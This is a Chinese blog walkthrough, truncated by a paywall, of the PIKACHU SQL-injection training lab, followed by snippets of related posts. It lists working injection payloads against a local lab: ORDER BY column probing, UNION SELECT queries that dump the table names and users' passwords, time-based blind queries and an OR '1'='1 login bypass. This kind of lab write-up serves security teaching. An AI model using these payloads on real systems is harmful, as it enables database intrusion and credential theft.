PIKACHU-SQL注入(1-5)

最新推荐文章于 2025-02-25 10:25:44 发布
最新推荐文章于 2025-02-25 10:25:44 发布
阅读量216 收藏
点赞数
分类专栏: pikachu 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/koala_king/article/details/129313196
版权
这篇博客详细介绍了PIKACHU平台上的SQL注入漏洞利用过程,包括数字型、字符型、搜索型和XXX型注入的步骤,以及insert/update注入的技巧。作者通过示例展示了如何找出列数、爆库、爆表、爆列和爆数据,涉及了SQL注入的各种常见类型。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1- 数字型注入(post)

在这里插入图片描述发到burp里查看发现是post类型
在这里插入图片描述开始用firefox的hackbar来实施注入
既然题目说了是数字型,就不找闭合了,按照下面的步骤进行:
1、找列数 payload: id=1 order by n#&submit=%E6%9F%A5%E8%AF%A2

payload中的n为数字,表示select语句结果的列数,如果猜测的列数小于等于select语句查询结果的列数,会返回本关开始那张图,如果猜测的列数大于select语句查询结果的列数,会返回报错。比如从下面两张图可知select语句查询结果有2列。
在这里插入图片描述在这里插入图片描述2、爆库 payload:id=1 union select database(),2#&submit=%E6%9F%A5%E8%AF%A2

上一步知道了查询结果有两列,再看浏览器的返回结果,有用户名和邮箱,所以估计返回结果的两列都是可显示的,因此爆库的时候随便选一列就好。
在这里插入图片描述3、爆表 payload:id=1 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#&submit=%E6%9F%A5%E8%AF%A2
在这里插入图片描述表有httpinfo,member,message,users,xssblind

4、爆列 payload:id=1 union select group_concat(column_name),2 from information_schema.columns where table_name=‘users’#&submit=%E6%9F%A5%E8%AF%A2
在这里插入图片描述5、爆数据 payload:id=1 union select username,password from users#&submit=%E6%9F%A5%E8%AF%A2
在这里插入图片描述

2-字符型注入

在这里插入图片描述开始进行sql注入步骤:

1、找列数 payload:http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=tony’ order by 2%23&submit=%E6%9F%A5%E8%AF%A2

payload中的%23就是#,由于在url中#有特殊含义所以要转义

原理和上一关一样,如果猜测的列数小于等于select语句查询结果的列数,会返回本关开始那张图,如果猜测的列数大于select语句查询结果的列数,会返回报错。

最终发现查询结果列数为2

2、爆库 payload:http://127.0.0.1/pikachu/vul/sqli/sqli_str.php?name=tony’ union select 1,database()%23&submit=%E6%9F%A5%E8%AF%A2

由于tony是不存在的用户,不会返回结果,因此返回的结果只有当前数据库名称,pikachu
在这里插入图片描述

3、爆表 payload: payloa

最低0.47元/天 解锁文章
pikachu靶场之SQL注入
2201_75766364的博客
03-28 1309
程序员在编写web程序时,没有对客户端提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库sql语句的执行结 果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或 系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。
pikachu靶场-SQL-Inject
braty_的博客
02-23 1558
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu-SQL注入
qq_43660551的博客
05-11 2076
发现kobe’ and if((substr(database(),1,1))=‘p’,sleep(5),null)#时,延迟了,就这样慢慢尝试,或者拿bp弄字典跑跑啥的。用load_file()务必先看secure_file_priv=“”。看看数据库名的长度:name=kobe’ and length(database())>=7#,这里需要url编码,即:name=kobe’+and+length(database())>%3d7%23&submit=%E6%9F%A5%E8%AF%A2。
关于PikachuSQL注入
最新发布
qq_65915499的博客
02-25 1897
name=1’+order+by+3–+ 报错。因为是搜索型注入根据语法‘%like%’输入1’后查看报错发现闭合应该是’通过admin和123456登录。尝试在user-agent注入。BP抓包尝试输入1’尝试注册利用报错注入。BP抓包尝试报错注入。使用sqlmap注入
pikachusql注入
m0_74394274的博客
09-19 1509
大家好
pikachuSQL注入
qq_58091216的博客
11-04 2431
SQL注入SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。
网络安全 - 综合靶场 - PIKACHU 源码包 - pikachu-master.zip
09-22
- **多漏洞场景**:包括但不限于 XSS(跨站脚本攻击)、SQL 注入、CSRF(跨站请求伪造)、文件上传漏洞、文件包含漏洞、命令执行漏洞等。 - **实战操作**:提供了一个真实的操作环境,让用户可以通过实际操作来理解...
pikachu-master.zip
06-25
1. SQL注入:这是一种常见的Web应用漏洞,攻击者通过构造恶意SQL语句,可以获取、修改或删除数据库中的敏感信息。在Pikachu靶场中,你可以学习如何识别SQL注入漏洞,以及使用各种技巧防止此类攻击。 2. XSS(跨站...
【信息安全】pikachu-SQL注入
Nicky_Zheng的博客
09-02 430
数字型注入 使用 1 or 1=1#探测,使用burpsuite截断post请求,修改提交的请求 使用 1 or 1=2#探测,使用burpsuite截断post请求,修改提交的请求 说明该处存在SQL注入 接下来需要使用order by 判断列数 oder by 2返回结果正常,说明只有2列 确认列数后,可使用union select获取数据库名、用户名 1 union select database(),user()# 通过information_schema获取当数据库表名 根据表名
pikachu-sql注入
Resets_的博客
04-01 672
pikachu sql数字型注入,字符型注入
pikachu平台之sql注入
qq_42728977的博客
12-24 779
参考链接 原理 SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 基本流程 1.2SQL注入攻击流程 第一步:注入点探测 自动方式:使用web漏洞扫描工具,自动进行注入点发现 手动方式:手工构造SQL注入测试语句进行注入点发现 第二步:信息获取 通过...
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 4314
Pikachu-----Sql Inject(SQL注入
Pikachu(皮卡丘)靶场中SQL注入
剁椒鱼头没剁椒的博客
12-14 5818
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
Pikachu-Sql Inject
baynk的博客
11-19 1069
0x00 Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 一个严重的SQL注入漏洞,可能会直接导致一家公司破产! SQL注入漏洞主要形成的原因是在数据交互中,端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后...
pikachusql注入
weixin_38720471的博客
01-07 3842
** 1原理 ** SQL注入漏洞主要形成的原因是在数据交互中,端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 2数字型注入 让id=true,从而使sql语句在查询时,id可以查询所有值 3字符型注入 3.1原理:首先用 ’ 判断是否存在字符型注入的漏洞 。因为在sql语句中 多个’会造成sql语句错误(结合sql语句),若加单引号后显示sql运行错误 ,则存在此
PIKACHU--SQL注入
鲨鱼辣椒的博客
05-17 1832
SQL Inject(SQL)概述 注入漏洞在全球漏洞排行榜上一直高居榜首而注入漏洞中首当其冲的就是数据库注入漏洞,SQL注入漏洞主要的成因是子啊数据交互中,端数据传入到后台处理时,没有做严格的过滤,导致传入后台的“数据”拼接到SQL语句中后,被当成SQL语句的一部分执行,从而产生与原本语句截然不同的意思,导致数据库受损(被脱裤、删除、甚至整个服务器权限沦陷) SQL注入流程 注入点探测 手动方式:手工构造SQL语句进行注入点发现 自动方式:采用自动扫描工具,自动进行注入点发现 信息获取 通过
Pikachu---SQL注入
从不专注的人的博客
07-05 2492
概述 什么是SQL注入漏洞 注入SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授
Pikachu靶场-SQL注入注入类型
01-01
### Pikachu靶场中的SQL注入类型教程 #### 数字型SQL注入 当应用程序未正确过滤用户输入且该输入被用于构建SQL查询的一部分时,可能会发生数字型SQL注入。如果参数是整数形式,则攻击者可以尝试通过改变这个数值来观察应用行为的变化从而判断是否存在漏洞[^2]。 对于Pikachu靶场而言,在某些情况下,向URL或表单提交的数据中附加特殊字符(如`'`),会触发数据库错误提示,这表明可能存在SQL注入风险[^3]。 ```sql ?id=1 AND 1=1 -- 正常显示页面内容 ?id=1 AND 1=2 -- 页面返回异常或者空白页 ``` #### 字符型SQL注入 字符型SQL注入通常发生在字符串类型的参数上。在这种场景下,可以通过在合法数据之后追加恶意构造的SQL片段来进行测试。例如: ```sql username=admin' OR '1'='1 password=a' OR 'a'='a ``` 这些命令利用了逻辑运算符OR使得条件永远成立,进而绕过身份验证机制[^1]。 #### 联合查询注入 为了进一步探索数据库结构,即所谓的“爆库”,可以采用UNION SELECT语句组合两个SELECT查询的结果集。此方法适用于已知目标站点存在可利用的SQL注入点,并希望从中提取额外的信息的情况。比如获取其他表格的名字、列名等敏感资料。 ```sql ?search=test'+union+select+null,table_name,null+from+information_schema.tables--+HTTP/1.1 Host: example.com ``` 上述例子展示了如何从MySQL内置的信息模式(information_schema)读取有关现有表的信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值